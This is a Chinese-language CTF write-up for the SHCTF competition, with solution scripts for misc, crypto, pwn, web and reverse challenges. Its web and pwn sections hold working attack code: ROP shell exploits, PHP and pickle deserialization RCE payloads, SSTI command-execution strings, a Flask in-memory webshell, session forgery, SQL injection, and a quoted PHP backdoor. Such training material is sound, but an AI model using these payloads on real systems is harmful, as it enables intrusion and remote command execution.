总排第28名,后续会对web复现
week1
Misc
签到题
公众号发对应内容就可以得到flag
Rasterizing Traffic
给的流量包,wireshark导出全部内容,中间的三个flag拼接是假的
最后一个导入010得到一个图片,网上搜索了一番知道是光栅隐写吧(是这么叫嘛)直接上exp,会跑出五个图片,拼接一下就行
from PIL import Image
import numpy as np
img = np.array(Image.open('a.png').convert('L')) # 确保图像是灰度的
for i in range(5):
z = np.zeros_like(img) # 创建全黑图像
z[:, i::5] = img[:, i::5] # 仅复制每5个像素的列
Image.fromarray(z).show()
拜师之旅①
给的图片不能正常查看,用010查看给加上正常的png开头给到图片,发现没有flag,crc爆破一下宽高得到flag
有WiFi干嘛不用呢?
简单的学一下
csv里面给了BSSID: EE:52:37:27:75:EB
may里面应该是密码字典,写个脚本提取一下内容,然后kali进行运行
aircrack-ng 01.cap -w pass.txt -b EE:52:37:27:75:EB -e target
import os
directory = 'may'
with open('pass.txt', 'w', encoding='utf-8') as output_file:
files = os.listdir(directory)
for file in files:
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
try:
with open(file_path, 'r', encoding='utf-8') as f:
content = f.read()
if len(content) > 2:
modified_content = content[1:-2]
else:
modified_content = content # 如果文件内容长度不够,则不进行截取
output_file.write(f"{modified_content}\n")
except Exception as e:
print(f"读取文件 {file} 时出错: {e}")
print("所有文件内容已保存到 pass.txt 中")
真真假假?遮遮掩掩!
第一层我直接用伪加密工具Zipcenop进行的然后到了第二层,给了hint,SHCTF??????FTCHS,有点眼熟可以进行简单的猜测,最后得出是202410,然后带入解压得到flag,在线掩码爆破也行
Crypto
EzAES
from Crypto.Cipher import AES
import os
# 替换为你之前打印的 IV 和 Key
iv = b'\x91\x9c\x9e\x9fP\x98%\xd2{\xbc\xee|\x98c\x00\xd2' # IV
key = b'\x1b\x16\xd9\xc9\xc9\x10[u\xd5\xbeR\x8f\xd0\x99\xfe\xc0' # Key
# 读取密文
ciphertext = b'n\xe0\xe5\xa7W&\x89\x8d\xe5\xbd\xc8\xcf\n]\xbb\xcfF<sm\xae\xb1yY\xaa\x9a\x1a\x93*\x80\xad:Q\xb0\x1d9\xc8w\x08WR\xea\x8c\xca\xd6\x99\xf5\x8b'
# 创建 AES 解密对象
my_aes = AES.new(key, AES.MODE_CBC, iv)
# 解密
plaintext = my_aes.decrypt(ciphertext)
# 去掉填充
plaintext = plaintext.rstrip(b' ')
# 输出解密后的明文
print(plaintext)
Hello Crypto
from Crypto.Util.number import long_to_bytes
m = 215055650564999213787435370441363980894435533627269060323553651075017072071074685867345899498649872049909340326243097196157
flag = long_to_bytes(m)
print(flag)
baby_mod
参考了一下某比赛的wp,需要用到LLL算法,在本地微调之后的脚本如下,不太懂密码,本地的sagemath也不太灵光
from Crypto.Util.number import long_to_bytes
from sage.all import *
# 密文和泄露的信息
c = 11454421006649444523173181606538145863693301443391411104476020392813188354552215237541156121746758260766189373235006192698011018103423719730694468959224
c = int(str(c) + "018990780114999724489697761346835348813863898197690613747060288212872603755938090881078090944985579244137762398288966180345904956701373459097473470489567378")
leak = -1457239467497770923738554308938779252194103808390298333375049349003518667390622623962565986306781435262634228918675745169896226699428349499145721234
leak = int(str(leak) + "545270574817562202671727008676598472467510294490895807123478089330411790070820510557303676413421705544423508474571278325171268094198633442810872810490979940393221644842305735264574402808330041918352683831517808255366623997677143893057026579")
r = 42606828099121205053846991305471624876675634413970417383658101034174961099590991091338816566296815476985911913200609816293298344668685957430209803900543
r = int(str(r) + "7862187841457950962311478142840359604893093112772355204586841584891592754560520121")
t = 43431252615108394128004779879998409954355258544308741393719751627109295930373577434186230529781229842377724105486808348002663162365228575615973691647630
t = int(str(t) + "7150053640166059613223862263789840507159058492697264635797552295028685772559578491")
# 构建矩阵
Ge = Matrix(ZZ, [
[leak, 0, 0, 0],
[r, 1, 0, 0],
[t, 0, 1, 0],
[-1, 0, 0, 2^500]
])
# 对第一列乘以 2^2000
Ge[:, 0] *= 2^2000
# LLL 约简
for line in Ge.LLL():
if line[0] == 0:
p, q = abs(line[1]), abs(line[2])
n = p * q
d = inverse(Integer(65537), (p - 1) * (q - 1))
# 将 m 转换为标准整数
m = pow(c, d, n)
print(long_to_bytes(int(m)))
factor
首先用yafu对N进行分解,然后带入对十选七进行全排列不重复,最后在答案区搜索SHCTF得到flag
from itertools import combinations
from Crypto.Util.number import *
import gmpy2
from math import prod
primes = [
10090316943954343501,
9584538385744661071,
9882099115896276037,
12935778997315545353,
14633606489606944033,
17359021365807747733,
10674490894804861513,
17744376529345008481,
13075868978049623633,
14346486611799750539
]
e = 65537
c = 18791760293830179824015973110611716748918716697136891148879107606156801766019039764839524314819248940389704627215761359769781402984529
N = prod(primes)
for p_list in combinations(primes, 7):
n = prod(p_list)
phi = 1
for p in p_list:
phi *= (p - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"组合: {p_list}, 解密后的 flag: {flag.decode(errors='ignore')}")
Pwn
签个到吧
c\at /f??? 1>&2
No stack overflow1
checksec一下发现有nx保护
ida打开发现有backdoor里面写入了bin/sh
一个gets的栈溢出,前面加\x00可以绕过,上exp
from pwn import *
p = remote('entry.shc.tf',28055)
payload=b'\x00'+b'a'*0x117+p64(0x4011DB)
p.sendline(payload)
p.interactive()
No stack overflow2
checksec一下开了nx
用ida打开,F5查看伪代码,先看main函数,有大小比较用-1绕过,没有system和sh,溢出点在read函数
用ROP gadget –binary ‘vuln’ –only ‘pop|ret’ ,查找rdi和ret的地址
from pwn import *
from LibcSearcher import *
# 设置连接和ELF文件
p = remote('210.44.150.15', 26065)
elf = ELF('./vuln')
# 常量定义
rdi = 0x0401223
ret = 0x040101a
main = 0x401228
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# 构造第一个payload,泄露puts地址
payload1 = b'a' * 0x108 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(b'-1')
p.sendline(payload1)
# 接收puts地址并计算libc基址
p.recvuntil('input: ')
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(f'puts_addr: {hex(puts_addr)}')
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
print(f'libcbase: {hex(libcbase)}')
# 计算system和"/bin/sh"地址
sys = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')
# 构造第二个payload,执行system("/bin/sh")
p.sendline(b"-1")
payload2 = b'a' * 0x108 + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
p.sendline(payload2)
p.interactive()
Web
1zflask
先看/robots.txt,再看/s3recttt下载了文件,看一下在/api下面可以执行,进行传参得到flag
?SSHCTFF=cat /flag
ez_gittt
githack坏了,用gitdump下来,然后如下操作
蛐蛐?蛐蛐!
看源码有提示根据提示前往,然后构造payload
?ququ=0114514
ququ=ququk1;system('cat /f*');
jvav
还没学过java,问gpt跑一下
import java.io.BufferedReader;
import java.io.InputStreamReader;
class demo {
public static void main(String[] args) {
String command = "cat /flag"; // 要执行的命令
String result = executeCommand(command);
System.out.println("Command output: " + result);
}
private static String executeCommand(String command) {
StringBuilder output = new StringBuilder();
try {
Process process = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
output.append(line).append("\n");
}
reader.close();
} catch (Exception e) {
e.printStackTrace();
}
return output.toString().trim();
}
}
poppopop
<?php
class SH {
public static $Web = true;
public static $SHCTF = true;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
}
}
}
$t = new T;
$t->n = new F;
$t->n->o = new C;
$t->n->o->p=new SHCTF;
$t->n->o->p->isyou='system';
$t->n->o->p->flag='cat /f*';
$exp = serialize($t);
$exp = base64_encode($exp);
echo $exp;
单身十八年的手速
直接js定位到alert然后base64解密得到flag
MD5 Master
<?php
highlight_file(__file__);
$master = "MD5 master!";
if(isset($_POST["master1"]) && isset($_POST["master2"])){
if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
echo $master . "<br>";
echo file_get_contents('/flag');
}
}
else{
die("master? <br>");
}
这题一开始的思路就是对的,只是由于编码的问题导致头一天没写出来,先用fastcoll对1.txt进行hash碰撞(内容是MD5 master!),然后用python进行读取内容,我php写的脚本就是一直不对,不知道为什么,然后拼接就可以得到flag了,最好用bp来发,hackbar会用url的编码问题
import urllib.parse
def read_my_file(path):
with open(path, 'rb') as fh:
data = fh.read()
return data
# 指定文件路径
file_path = "test_msg2.txt"
encoded_data = urllib.parse.quote(read_my_file(file_path))
print(f"URL 编码后的内容: {encoded_data}")
Ai
小助手
Re
gamegame
程序简单跑一下,用ida查看一下发现flag就是数独空白下来的拼接,找个在线网站填一下数独就行
ezapk
用jeb打开定位一下,同时模拟器查看一下是什么apk
写exp
import base64
def decode(encoded_str, key):
decoded_bytes = base64.b64decode(encoded_str)
decrypted_chars = []
for i, byte in enumerate(decoded_bytes.decode('utf-8')):
char_value = ord(byte)
char_value //= 2
char_value -= 6
decrypted_char = char_value ^ key[i % len(key)]
decrypted_chars.append(chr(decrypted_char))
return ''.join(decrypted_chars)
key = [12, 15, 25, 30, 36]
# 加密后的字符串
encoded_str = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
# 执行解密
decrypted_str = decode(encoded_str, key)
print("Decrypted String:", decrypted_str)
print('SHCTF{'+decrypted_str+"}")
ezrc4
看main函数和一些其他加密逻辑rc4解密,跑一下脚本
import struct
def rc4_init(key):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
return S
def rc4_decrypt(data, key):
S = rc4_init(key)
i = j = 0
result = []
for char in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
result.append(char ^ k ^ 0x66)
return bytes(result)
# 从主函数中提取的加密标志
encrypted_flag = struct.pack('<QQQ', 0x5B3C8F65423FAB21, 0x691AE7846E05170C, 0x111F7077C3)
# 从sub_1200函数中提取的密钥
key = struct.pack('<Q', 0x212179654B6E6546)
# 解密
decrypted = rc4_decrypt(encrypted_flag, key)
# 提取有效的flag部分
flag = decrypted.split(b'}')[0] + b'}'
print("Flag:", flag.decode('ascii'))
ezxor
按逻辑进行简单的xor就行,上exp
#include <iostream>
#include <cstring>
int main() {
char v9[50] = {-61, 105, 114, -60, 103, 74, -24, 17, 67, -49, 'o', '\0', -13, 68, 110, -8, 89, 73, -24, 78, 94, -30, 83, 67, -79, 92}; // flag 加密后的值
char decrypted[50] = {0};
for (int j = 0; j < 50; ++j) {
if (j % 3 == 0) {
decrypted[j] = v9[j] ^ 0x90;
} else if (j % 3 == 1) {
decrypted[j] = v9[j] ^ 0x21;
} else {
decrypted[j] = v9[j] ^ 0x31;
}
}
std::cout << "Decrypted flag: ";
for (int i = 0; i < 50; ++i) {
std::cout << decrypted[i];
}
std::cout << std::endl;
return 0;
}
PPC
绑定QQ账号
在qq群绑定一下就行,然后网站出flag,记得刷新一下就行
week2
web
guess_the_number
import requests
import random
first_num = 2060849645
def find_flag():
for seed in range(1000000, 9999999):
random.seed(seed)
# 生成 first_num,以确保我们使用的是同一个种子
generated_first_num = random.randint(1000000000, 9999999999)
if generated_first_num == first_num:
# 生成 second_num
second_num = random.randint(1000000000, 9999999999)
# 发送请求到 /guess
url = f"http://210.44.150.15:25676/guess?num={second_num}"
response = requests.get(url)
# 打印每次请求的结果
print(
f'Seed: {seed}, First Num: {generated_first_num}, Second Num: {second_num}, Response: {response.text}')
# 检查响应内容中是否包含 flag
if 'flag' in response.text:
print(f'Found flag with seed {seed}: {response.text}')
break # 找到后退出循环
find_flag()
自助查询
前面正常的查询最后一步有提示是注释里,查询 column_comment得到flag
1") UNION SELECT column_name, column_comment FROM information_schema.columns WHERE table_name='flag' --
入侵者禁入
考察的session,需要利用模板注入
python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t '{"role":{"flag":"{{ 7*7 }}","is_admin":1}}'
测试到有注入点
然后测试
TEMPLATE="{\"role\":{\"flag\":\"{% print(url_for.__globals__[\\'__builtins__\\'][\\'eval\\'](\\\"__import__(\\\\\\'os\\\\\\').popen(\\\\\\'ls \\/\\\\\\').read()\\\")) %}\",\"is_admin\":1}}"
python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t "$TEMPLATE"
发现有flag,最后
$ TEMPLATE="{\"role\":{\"flag\":\"{% print(url_for.__globals__[\\'__builtins__\\'][\\'eval\\'](\\\"__import__(\\\\\\'os\\\\\\').popen(\\\\\\'cat \\/flag\\\\\\').read()\\\")) %}\",\"is_admin\":1}}"
python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t "$TEMPLATE"
dickle
pickle序列化,简单的尝试了一下,注意环境需要用linux运行脚本,得到flag
import pickle
import subprocess
import base64
class Exploit:
def __reduce__(self):
# 使用 subprocess 来执行命令并返回其输出
return (subprocess.getoutput, ('cat /flag',))
# 序列化 Exploit 对象
payload = pickle.dumps(Exploit())
encoded_payload = base64.b64encode(payload).decode()
print(encoded_payload)
得到的flag的为类似下方的,需要简单调节拼接一下内容
Deserialized data: ['S', 'H', 'C', 'T', 'F',
登录验证
登陆拿去cookie用jwt_tool爆破一下密钥
前端是弱密码admin:admin,然后也把cookie改一下得到flag
MD5 GOD!(复现)
先看源码
from flask import *
import hashlib, os, random
app = Flask(__name__)
app.config["SECRET_KEY"] = "Th1s_is_5ecr3t_k3y"
salt = os.urandom(16)
def md5(data):
return hashlib.md5(data).hexdigest().encode()
def check_sign(sign, username, msg, salt):
if sign == md5(salt + msg + username):
return True
return False
def getRandom(str_length=16):
random_str =''
base_str ='ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
length =len(base_str) -1
for i in range(str_length):
random_str +=base_str[random.randint(0, length)]
return random_str
users = {}
sign_users = {}
@app.route("/")
def index():
if session.get('sign') == None or session.get('username') == None or session.get('msg') == None:
return redirect("/login")
sign = session.get('sign')
username = session.get('username')
msg = session.get('msg')
if check_sign(sign, username, msg, salt):
sign_users[username.decode()] = 1
return "签到成功"
return redirect("/login")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get('username')
password = request.form.get('password')
# print(password)
if username in users and users[username] == password:
session["username"] = username.encode()
session["msg"] = md5(salt + password.encode())
session["sign"] = md5(salt + md5(salt + password.encode()) + username.encode())
return "登陆成功"
else:
return "登陆失败"
else:
return render_template("login.html")
@app.route("/users")
def user():
return json.dumps(sign_users)
@app.route("/flag")
def flag():
for user in users:
if sign_users[user] != 1:
return "flag{杂鱼~}"
return open('/flag', 'r').read()
def init():
global users, sign_users
for _ in range(64):
username = getRandom(8)
pwd = getRandom(16)
users[username] = pwd
sign_users[username] = 0
users["student"] = "student"
sign_users["student"] = 0
init()
题目的要求是64个用户全部签到就可以得到flag了
访问/users可以得到用户的信息
/login 路由可以登陆
/ 路由是签到的
/flag可以得到flag
定位一下关键脚本
def check_sign(sign, username, msg, salt):
if sign == md5(salt + msg + username):
return True
return False
@app.route("/")
def index():
if session.get('sign') == None or session.get('username') == None or session.get('msg') == None:
return redirect("/login")
sign = session.get('sign')
username = session.get('username')
msg = session.get('msg')
if check_sign(sign, username, msg, salt):
sign_users[username.decode()] = 1
return "签到成功"
return redirect("/login")
可以知道,只要session里的 sign 和最终 md5(salt + msg + username) 相等即可签到成功
这里的salt是未知的,但最初的账号 student 的所有信息是已知的,可以用这个账号的相关信息来做hash长度拓展攻击
hash长度拓展之前打base有个现成的脚本
接着是session伪造,SECRET_KEY 已经给出是 Th1s_is_5ecr3t_k3y可以调用flask_session_cookie_manager3.py里的代码
import hashlib
import math
from typing import Any, Dict, List
rotate_amounts = [7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,
5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20,
4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,
6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21]
constants = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
functions = 16 * [lambda b, c, d: (b & c) | (~b & d)] + \
16 * [lambda b, c, d: (d & b) | (~d & c)] + \
16 * [lambda b, c, d: b ^ c ^ d] + \
16 * [lambda b, c, d: c ^ (b | ~d)]
index_functions = 16 * [lambda i: i] + \
16 * [lambda i: (5 * i + 1) % 16] + \
16 * [lambda i: (3 * i + 5) % 16] + \
16 * [lambda i: (7 * i) % 16]
def get_init_values(A: int = 0x67452301, B: int = 0xefcdab89, C: int = 0x98badcfe, D: int = 0x10325476) -> List[int]:
return [A, B, C, D]
def left_rotate(x, amount):
x &= 0xFFFFFFFF
return ((x << amount) | (x >> (32 - amount))) & 0xFFFFFFFF
def padding_message(msg: bytes) -> bytes:
"""
在MD5算法中,首先需要对输入信息进行填充,使其位长对512求余的结果等于448,并且填充必须进行,即使其位长对512求余的结果等于448。
因此,信息的位长(Bits Length)将被扩展至N*512+448,N为一个非负整数,N可以是零。
填充的方法如下:
1) 在信息的后面填充一个1和无数个0,直到满足上面的条件时才停止用0对信息的填充。
2) 在这个结果后面附加一个以64位二进制表示的填充前信息长度(单位为Bit),如果二进制表示的填充前信息长度超过64位,则取低64位。
经过这两步的处理,信息的位长=N*512+448+64=(N+1)*512,即长度恰好是512的整数倍。这样做的原因是为满足后面处理中对信息长度的要求。
"""
orig_len_in_bits = (8 * len(msg)) & 0xffffffffffffffff
msg += bytes([0x80])
while len(msg) % 64 != 56:
msg += bytes([0x00])
msg += orig_len_in_bits.to_bytes(8, byteorder='little')
return msg
def md5(message: bytes, A: int = 0x67452301, B: int = 0xefcdab89, C: int = 0x98badcfe, D: int = 0x10325476) -> int:
message = padding_message(message)
hash_pieces = get_init_values(A, B, C, D)[:]
for chunk_ofst in range(0, len(message), 64):
a, b, c, d = hash_pieces
chunk = message[chunk_ofst:chunk_ofst + 64]
for i in range(64):
f = functions[i](b, c, d)
g = index_functions[i](i)
to_rotate = a + f + constants[i] + int.from_bytes(chunk[4 * g:4 * g + 4], byteorder='little')
new_b = (b + left_rotate(to_rotate, rotate_amounts[i])) & 0xFFFFFFFF
a, b, c, d = d, new_b, b, c
for i, val in enumerate([a, b, c, d]):
hash_pieces[i] += val
hash_pieces[i] &= 0xFFFFFFFF
return sum(x << (32 * i) for i, x in enumerate(hash_pieces))
def md5_to_hex(digest: int) -> str:
raw = digest.to_bytes(16, byteorder='little')
return '{:032x}'.format(int.from_bytes(raw, byteorder='big'))
def get_md5(message: bytes, A: int = 0x67452301, B: int = 0xefcdab89, C: int = 0x98badcfe, D: int = 0x10325476) -> str:
return md5_to_hex(md5(message, A, B, C, D))
def md5_attack(message: bytes, A: int = 0x67452301, B: int = 0xefcdab89, C: int = 0x98badcfe,
D: int = 0x10325476) -> int:
hash_pieces = get_init_values(A, B, C, D)[:]
for chunk_ofst in range(0, len(message), 64):
a, b, c, d = hash_pieces
chunk = message[chunk_ofst:chunk_ofst + 64]
for i in range(64):
f = functions[i](b, c, d)
g = index_functions[i](i)
to_rotate = a + f + constants[i] + int.from_bytes(chunk[4 * g:4 * g + 4], byteorder='little')
new_b = (b + left_rotate(to_rotate, rotate_amounts[i])) & 0xFFFFFFFF
a, b, c, d = d, new_b, b, c
for i, val in enumerate([a, b, c, d]):
hash_pieces[i] += val
hash_pieces[i] &= 0xFFFFFFFF
return sum(x << (32 * i) for i, x in enumerate(hash_pieces))
def get_init_values_from_hash_str(real_hash: str) -> List[int]:
"""
Args:
real_hash: 真实的hash结算结果
Returns: 哈希初始化值[A, B, C, D]
"""
str_list: List[str] = [real_hash[i * 8:(i + 1) * 8] for i in range(4)]
# 先按照小端字节序将十六进制字符串转换成整数,然后按照大端字节序重新读取这个数字
return [int.from_bytes(int('0x' + s, 16).to_bytes(4, byteorder='little'), byteorder='big') for s in str_list]
def get_md5_attack_materials(origin_msg: bytes, key_len: int, real_hash: str, append_data: bytes) -> Dict[str, Any]:
"""
Args:
origin_msg: 原始的消息字节流
key_len: 原始密钥(盐)的长度
real_hash: 计算出的真实的hash值
append_data: 需要添加的攻击数据
Returns: 发起攻击需要的物料信息
{
'attack_fake_msg': bytes([...]),
'attack_hash_value': str(a1b2c3d4...)
}
"""
init_values = get_init_values_from_hash_str(real_hash)
# print(['{:08x}'.format(x) for x in init_values])
# 只知道key的长度,不知道key的具体内容时,任意填充key的内容
fake_key: bytes = bytes([0xff for _ in range(key_len)])
# 计算出加了append_data后的真实填充数据
finally_padded_attack_data = padding_message(padding_message(fake_key + origin_msg) + append_data)
# 攻击者提前计算添加了攻击数据的哈希
attack_hash_value = md5_to_hex(md5_attack(finally_padded_attack_data[len(padding_message(fake_key + origin_msg)):],
A=init_values[0],
B=init_values[1],
C=init_values[2],
D=init_values[3]))
fake_padding_data = padding_message(fake_key + origin_msg)[len(fake_key + origin_msg):]
attack_fake_msg = origin_msg + fake_padding_data + append_data
return {'attack_fake_msg': attack_fake_msg, 'attack_hash_value': attack_hash_value}
from flask.sessions import SecureCookieSessionInterface
import requests, json, time
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
def session_decode(session_cookie_value, secret_key):
""" Decode a Flask cookie """
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
def session_encode(session_cookie_structure, secret_key):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
# session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
def req_index(url, cookie):
# headers = {"Cookie": "session=" + cookie}
cookies = {"session":cookie}
r = requests.get(url, cookies=cookies).text
# print(r)
if '签到成功' not in r:
# print(cookie)
time.sleep(1)
req_index(url, cookie)
# print(r)
def req_user(url):
return json.loads(requests.get(url).text)
def req_login(url):
data = {"username":"student", "password":"student"}
cookie = requests.post(url, data).headers["Set-Cookie"][8:].split(';')[0]
# print(cookie)
return cookie
def hash_Attack(md5_value, key_len, data, attack_data):
attack_materials = get_md5_attack_materials(data, key_len, md5_value.decode(), attack_data)
# print(data)
res = {"username":attack_data, "msg":attack_materials['attack_fake_msg'][:-len(attack_data)], "sign":attack_materials['attack_hash_value'].encode()}
return res
if __name__ == '__main__':
url = "http://210.44.150.15:47666/"
cookie = req_login(url+'login')
users = req_user(url+'users')
secret_key = "Th1s_is_5ecr3t_k3y"
res = session_decode(cookie, secret_key)
for user in users:
if users[user] == 0:
res = hash_Attack(res["sign"], 16, res["msg"]+res["username"], user.encode())
res2 = session_encode(res, secret_key)
# time.sleep(1)
r = req_index(url, res2)
自己一开始其实已经搓好脚本了,但是一直调用不好,就直接上官p了
crypto
魔鬼的步伐
from Crypto.Util.number import long_to_bytes
from math import gcd
def pollard_p1(n):
a = 2
for i in range(2, 100000):
a = pow(a, i, n)
d = gcd(a - 1, n)
if 1 < d < n:
return d
return None
n = 2831832791030609530715813213220019883048914189158756797307958158408447051630508377374040550762130532585789257283656903976093710799661936572635199760487152921738463539735395878201301223666364287975878427298711981759489133322514450542491313745324153974993874104970865609328318781784747005428502998650052645698811657
e = 65537
c = 277886534227205145921457730106662348869574033254759302593748922500501707927099574576237860088700790266316998558285705873756211980752787668038757766667343292786435728705389634346196021354871807428435121426405798244396230131921055698729045936487882618606410991938850305317286706006559422640483458860444177938881800
# 使用 Pollard's p-1 算法来因式分解 n
p = pollard_p1(n)
q = n // p
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode()
print(f"Decrypted flag: {flag}")
worde很大
from Crypto.Util.number import getPrime,long_to_bytes
import gmpy2
n = 130433353485114808362891473473687063450960194937676119243199446452481897128998745221120731419339412044208064119908758711834838645767782724735230587850283436574369664159096103050287644689328716204472869291844135677716993421012781378455475934816332308522080394895659167943720237016096316321598240463439917555281
c = 113481028807797740037371035561982400582216347323064462704823511064717743759816353553711535800864287099830079892568173444272959071112043294532294530031945500092151286531985831158853663827132668376187003261937157640029140101561586890243591683063607063713791333133210662159262006241032211052722483961060241094497
e = 1052399395403315650954843878395162921915412936034670295881299
dp = 10401970562842714823433011053885095731667426359291853822584611025061595365689032401513692452915352091669078429838636807965495759380977994966274049008153199
a = getPrime(10)
p = gmpy2.gcd(pow(a,dp*e,n)-a,n)
m = pow(c,dp,p)
print(long_to_bytes(m))
week3
crypto
babyLCG
from Crypto.Util.number import *
import itertools
# Given parameters
a = 2314263556681405131427434567397721554084880715002737002374447625890031179538396443026861034624920599042538939666756802003
b = 2303270095373091755028150204192621881624870682086240301196159556738806285789162309361059161301421010273000801707364139301
p = 1785338523770596929007042881767789771169994055441005505378421343570059111347682949630788644017267333793887728906549496559
c = [
1241585594145948568010297947806690682620161405184519680517131577883608946115221281877403406394716,
783745699152795646128200231796229145162258118907090494213671524973697625898415316535828899751033,
244960939438293041293560739941286165510749607918699325252666815425914305519670411696985473344258
]
# Define the small_roots function
def small_roots(f, bounds, m=1, d=None):
if not d:
d = f.degree()
R = f.base_ring()
N = R.cardinality()
f /= f.coefficients().pop(0)
f = f.change_ring(ZZ)
G = Sequence([], f.parent())
for i in range(m + 1):
base = N ** (m - i) * f ** i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)
B, monomials = G.coefficient_matrix()
monomials = vector(monomials)
factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)
B = B.dense_matrix().LLL()
B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1 / factor)
H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B * monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots
return []
# Reconstructing the polynomial
PR.<x, y> = PolynomialRing(Zmod(p))
f = ((c[0] << 80) + x) * a + b - ((c[1] << 80) + y)
# Finding small roots
roots = small_roots(f, (2**80, 2**80), m=4, d=4)
# Calculating the seed
s1 = (c[0] << 80) + roots[0][0]
seed = (s1 - b) * inverse_mod(a, p) % p
# Converting the seed back to bytes
flag = bytes.fromhex(hex(seed)[2:]).decode()
print(flag) # Outputs the original flag
web
小小cms
先试了/admin,有登录窗口,默认密码登陆,简单搜查一下,有个数据库里面插入了flag,dump下来发现是假的flag,然后创建了一个用户试了一下前端传马看看是否执行,不行,没办法去搜了一下7.0的漏洞,直接按照这个url进行shell的https://blog.csdn.net/shelter1234567/article/details/138524342,最后上截图
love_flask
简单的ssti的内存马,测试是没有回显的,我尝试了两种方法,一种是内部弹shell给我vps没有成功,还有一种是直接执行rce,上马
{{ url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/orange', 'orange', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())", {'_request_ctx_stack': url_for.__globals__['_request_ctx_stack'], 'app': url_for.__globals__['current_app']}) }}
拜师之旅·番外
png的二次渲染,上脚本
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
执行0=system和post发包1=cat /flag
然后ctrl+s保存图片用记事本看得到flag
hacked_website(复现)
当时扫到了www.zip,下载可以看文件,然后就没思路了当时没想到用d盾扫一下
可以发现是有后面的,定位一下关键文件
文件里有这个门
<?php $a = 'sys';$b = 'tem';$x = $a.$b;if (!isset($_POST['SH'])) {$z = "''";} else $z = $_POST['SH'];?>
/admin里面登陆一下,fuzz一下密码
到对应的php里面输入得到flag明明挺简单的为什么没想到解法,当时全在往typecho的cve里面想
顰(复现)
应该考察的就是算pin,写题的时候其他的数据都找到了没找到console,不明白为什么不触发orz
官p给了一个链接调试应用程序 — Werkzeug 中文文档 (3.0.x) (palletsprojects.com)
By default, , any subdomain, and are trusted. will trust its argument as well. To change this further, use the debug middleware directly rather than through .localhost.localhost127.0.0.1run_simplehostnameuse_debugger=True
需要host是127.0.0.1添加header Host:127.0.0.1剩余的正常都可以找到
/sys/class/net/eth0/address---->b6:45:6c:7d:2e:b1 #mac
